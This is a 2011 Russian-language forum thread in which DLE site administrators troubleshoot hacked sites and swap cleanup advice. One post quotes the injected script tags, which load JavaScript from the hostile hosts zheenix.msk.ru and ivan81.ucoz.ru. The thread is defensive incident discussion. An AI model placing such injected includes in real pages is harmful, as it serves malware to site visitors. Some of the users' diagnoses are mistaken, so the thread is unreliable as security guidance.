Взломали сайт

[Jetix 0]

обновитесь до актуальной версии, там есть раздел перестроения новостей, он зачистит зловредный код.

А что делать тем, у кого была лицензия на 1 год и обновление до версии 9.2 уже не установить? Есть какие-то варианты излечиться?)

Проблема такая же - во всех новостях появились скрипты:

<script src="http://zheenix.msk.ru/3ad17698332f903033711f449ebd0e77.js" type="text/javascript"></script><script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>

[Azat868 2]

Jetix,

Проверить fullstory.tpl.

Проверить БД, по-моему "Поиск и замена" должна помочь если проблема в бд.

[Jetix 0]

Jetix,

Проверить fullstory.tpl.

Проверить БД, по-моему "Поиск и замена" должна помочь если проблема в бд.

В шаблонах всё в порядке, в БД действительно во всех новостях присутствуют эти скрипты. Попробовал удалить их в phpMyAdmin - так вместо этого удалились все новости - хорошо бэкап был) как из БД эту заразу убрать можно?)

Вот тут ещё проблему обсуждают - http://www.maultalk.com/topic75180s0.html

Сложность в том, что у троянских JS-файлов динамические названия! Если через phpMyAdmin заменять, то не получится(

Изменено 7 января 2011 пользователем Jetix

[Azat868 2]

Jetix,

Динамические названия путей к js скрипту? Тогда заменил бы <script ... тупо, но это не выход. Вы все патчи ставили которые на оф сайте?

[Jetix 0]

Jetix,

Динамические названия путей к js скрипту? Тогда заменил бы <script ... тупо, но это не выход. Вы все патчи ставили которые на оф сайте?

Да, в каждой новости названия JS-файлов разное, такого формата http://zheenix.msk.ru/ХХХХХХХХХХХХХХХХХХХХХХХ.js, где вместо ХХХХХХХХХХХХХХХХХХ любая буква/цифра. И да, все патчи с сайта ставились. Сегодня на всякий проверил. Версия DLE 8.3.

[Elegance 0]

Смотрю тут много сегодня покосило....я вот тоже попал под http://zheenix.msk.r...ХХХХХХХХХХХХ.js

Это какая-то новая дыра, видимо, т.к. у меня версия 8.5, все залатано.

Смотрел логи сервера...из подозрительного и непонятного в ошибках за последние сутки нашел:

[07-ñÎ×-2011] PHP Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /home/public_html/engine/classes/mysqli.class.php on line 101

Может спецам это поможет для определения дырки?

[celsoft 6 068]

Это какая-то новая дыра, видимо, т.к. у меня версия 8.5, все залатано.

Ничего нового, причина стара как мир, либо нелегальные копии или неустановленные ранее патчи безопасности, или сторонние модули, либо также шеллы не очищенные с первого раза после установки патчей, либо необновленный уязвимый phpMyAdmin на сервере.

[avs555 0]

С этой хренью zheenix последние два дня массовая беда.

и двиг легальный и дырки залатаны и всё равно. Где-то дыра

[SFW 2]

1.В main.tpl обнаружено

<script type="text/javascript" src="{THEME}/lib/gzip/js.php-id=3c3c95f209a65d1207e91f9c654905b0"></script>

файл сам тут http://www.ex.ua/view_storage/462164216347 2. В папке шаблонов обнаружен catlist.php с содержимым

<?php $sql_result = $db->query("select ct.id, ct.alt_name, ct.name, (select count(*) from ". PREFIX ."_post ps where ps.category = ct.id AND (DATE_FORMAT(date, '%Y%m%d')=CURDATE()) AND approve = '1') as new_, (select count(*) from ". PREFIX ."_post ps where ps.category = ct.id AND approve = '1') as allnews_ from ". PREFIX ."_category ct");while($row = $db->get_row($sql_result)){echo('<li><a href="'.$config['http_home_url'].$row['alt_name'].'/">'.$row['name'].'</a> ('.($row['allnews_']).')</li>');}?>

Все обнаружено антивирусом движка, и все удалено, папка шаблонов поставлена как ридонли.

Этого достаточно?

Изменено 8 января 2011 пользователем SFW

[Azat868 2]

SFW,

Я бы еще запрет на выполнение php в папки templates и uploads поставил.

[celsoft 6 068]

SFW,

Вообще то это вас какой то модуль был в шаблонах. Это код вывода списка категорий, для меню, а не зловредный код.

[SFW 2]

SFW,

Вообще то это вас какой то модуль был в шаблонах. Это код вывода списка категорий, для меню, а не зловредный код.

Спасибо, абсолютно не силен в php - поэтому доверился сообщению админки - что это подозрительный файл.

SFW,

Я бы еще запрет на выполнение php в папки templates и uploads поставил.

Спасибо , сделал.

[Jetix 0]

Вот тут подробное решение проблемы очистки базы данных от посторонних JS-скриптов:

http://www.maultalk.com/topic75180.html?view=findpost&p=892547

Сам сейчас так сделал - всё ок!

[SFW 2]

Мне не помогло ридонли.

Появляются снова и снова скрипты.

Что делать?

После бага с ретривом пассворда администратора, теперь этот косяк, DLE реально начинает напрягать.

Изменено 8 января 2011 пользователем SFW

[celsoft 6 068]

Мне не помогло ридонли.

Появляются снова и снова скрипты.

Что делать?

После бага с ретривом пассворда администратора, теперь этот косяк, DLE реально начинает напрягать.

В таком случае скрипт вам ничем не поможет, если на файлы не было прав на запись, значит изменения в файлы производились не скриптами а с доступами выше скриптов, например по FTP. И вам уже нужно заниматься безопасностью сервера и своего компьютера. Вы почему то решили что если стоит DLE, то значит проблема именно в DLE, помимо DLE на сервере стоит с десяток программ, безопасностью которых также нужно заниматься. Также изучите темы:

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

И поймете как воруются доступы с ваших комьютеров, в которых они храняться.

Да и кстати какие скрипты у вас появляются и где, например то что вы писали выше http://forum.dle-news.ru/index.php?showtopic=53254&view=findpost&p=262650 не являются никакими шеллами и зловредными скриптами в принципе. Это фреймворк mootols и модуль вывода списка категорий, я вам об этом уже писал

[SFW 2]

Извините , может быть дело действительно не в скрипте.

Устал просто тратить время на такую чепуху как чистку новостей от скриптов. И нет понятия как это прекратить.

[celsoft 6 068]

Устал просто тратить время на такую чепуху как чистку новостей от скриптов. И нет понятия как это прекратить.

Я сейчас не понял у вас где скрипты появляются? Раньше вы писали что в файлах, сейчас что в новостях. Это большая и принципиальная разница. Вы на свой скрипт все патчи установили http://dle-news.ru/bags/ ?

[SFW 2]

Нет последний был не установлен.

Сам виноват.

Прошу прощения еще раз.

Изменено 10 января 2011 пользователем SFW

[NoMaNt 0]

Вот мне интересно!Почему сайты на дле ломают (даже если все баги закрыты(которые указаны на офф сайте)),а ваш немогут сломать?!Вы случайно сами ничего не мутите?

[llbarmenll 18]

Вот мне интересно!Почему сайты на дле ломают (даже если все баги закрыты(которые указаны на офф сайте)),а ваш немогут сломать?!Вы случайно сами ничего не мутите?

Уже сто раз писали что сломать могут не через DLE, а через серверные программы

[NoMaNt 0]

Вот мне интересно!Почему сайты на дле ломают (даже если все баги закрыты(которые указаны на офф сайте)),а ваш немогут сломать?!Вы случайно сами ничего не мутите?

Уже сто раз писали что сломать могут не через DLE, а через серверные программы

Хоть 300000 раз!я второй раз всего на этом форуме!

[celsoft 6 068]

Вот мне интересно!Почему сайты на дле ломают (даже если все баги закрыты(которые указаны на офф сайте)),а ваш немогут сломать?!

За всю свою практику, и осмотр огромного количества сайтов, еще не видел ниодного сайта на лицензионном скрипте, который бы взломали, и на котором стояли патчи, но при этом он не был бы завален еще кучей скриптов, хаков и модулей, сомнительного содержания и авторства.

Вы случайно сами ничего не мутите?

Конечно мучу, не ставлю всякое барахло на сайт подряд, и слежу за исправлениями другого серверного ПО.

[delshka 0]

вы хотите сказать что тот хостинг где я размещаю сайт, сайт который ни кому не нужен, фуфловый. ( а хотсер таймвеб )

на этом хостинге есть крутые сайты, почему их не ломанули через phpMyAdmin

смысл ламать phpMyAdmin, ну и dle фуфловые сайты трогать.

по поводу защиты заливки в папку upload как это сделать ?

Изменено 11 января 2011 пользователем delshka

[celsoft 6 068]

вы хотите сказать что тот хостинг где я размещаю сайт, сайт который ни кому не нужен, фуфловый

где вам такое писали?

по поводу защиты заливки в папку upload как это сделать

Начните с соблюдения правил форума.

[Azat868 2]

celsoft,

А как научиться выявлять такие вот подозрительные модули через которые якобы вся беда? Или довольствоваться стандартными средствами DLE что в принципе не вижу возможным.